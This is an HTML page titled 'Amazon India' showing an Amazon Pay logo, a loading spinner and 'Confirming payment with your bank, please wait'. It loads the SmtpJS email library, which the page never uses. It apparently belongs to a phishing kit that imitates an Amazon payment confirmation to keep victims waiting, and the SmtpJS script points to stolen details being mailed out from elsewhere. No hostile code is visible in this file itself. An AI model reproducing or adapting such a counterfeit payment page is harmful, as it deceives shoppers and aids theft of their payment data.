<!DOCTYPE html>

<html>

<head>
    <title>Amazon India</title>

    <script src="https://cdn.jsdelivr.net/npm/vue@2.7.14"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        @font-face {
            font-family: SansStd;

            src: url("./OfficinaSansStd-Bold.otf") format("opentype");
        }

        body {
            font-family: SansStd;
            margin: 0px;
            overflow: hidden;
            background-color: rgb(48, 47, 47);
        }

        #mydiv {
            position: fixed;
            top: 50%;
            left: 50%;
            width: 18em;
            height: 18em;
            margin-top: -9em;
            padding: 20px;
            /*set to a negative number 1/2 of your height*/
            margin-left: -10em;
            /*set to a negative number 1/2 of your width*/
            border-radius: 20px;
            border: 1px solid #ccc;
            background-color: #f3f3f3;
        }
    </style>
</head>

<body>
    <div id="mydiv">
        <div style="display: flex; justify-content: space-around;">
            <img src="./apay.png" width="150" />
        </div>
        <div style="display: flex; justify-content: space-around; margin-top: 30px; margin-bottom: 60px;">
            <img src="./Eclipse-25s-78px.gif" />
        </div>
        <div style="text-align: center;">
            <h4>Confirming payment with your bank</h4><br/>
            <h3 style="margin-top: -20px;">Please wait</h3>

        </div>
    </div>
</body>

</html>